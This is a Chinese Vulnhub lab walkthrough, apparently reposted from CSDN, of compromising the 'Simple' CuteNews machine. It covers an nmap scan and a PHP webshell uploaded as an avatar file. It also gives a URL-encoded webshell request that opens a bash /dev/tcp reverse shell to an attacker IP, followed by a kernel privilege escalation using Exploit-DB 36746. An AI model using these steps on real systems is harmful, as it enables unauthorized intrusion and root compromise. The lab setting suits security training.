欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 财经 > 创投人物 > [Vulnhub] Simple CuteNews-CMS+Kernel权限提升

[Vulnhub] Simple CuteNews-CMS+Kernel权限提升

2025/2/24 11:32:37 来源:https://blog.csdn.net/qq_51886509/article/details/140404587  浏览:    关键词:[Vulnhub] Simple CuteNews-CMS+Kernel权限提升

信息收集

IP AddressOpening Ports
192.168.8.104TCP:80

$ nmap -p- 192.168.8.104 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)

本地权限

image.png

注册用户登录

image-1.png

image-2.png

Content-Disposition: form-data; name="avatar_file"; filename="reverse.php"

image-3.png

image-4.png

http://192.168.8.104/uploads/avatar_admin2_reverse.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.8.107%2F10032%200%3E%261%27

image-5.png

权限提升

$ cat /etc/os-release

image-7.png

https://www.exploit-db.com/exploits/36746

$ gcc 36746.c -static -o 36746

# ./36746

image-6.png

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

相关资讯

热文排行

最新新闻

推荐新闻

热搜词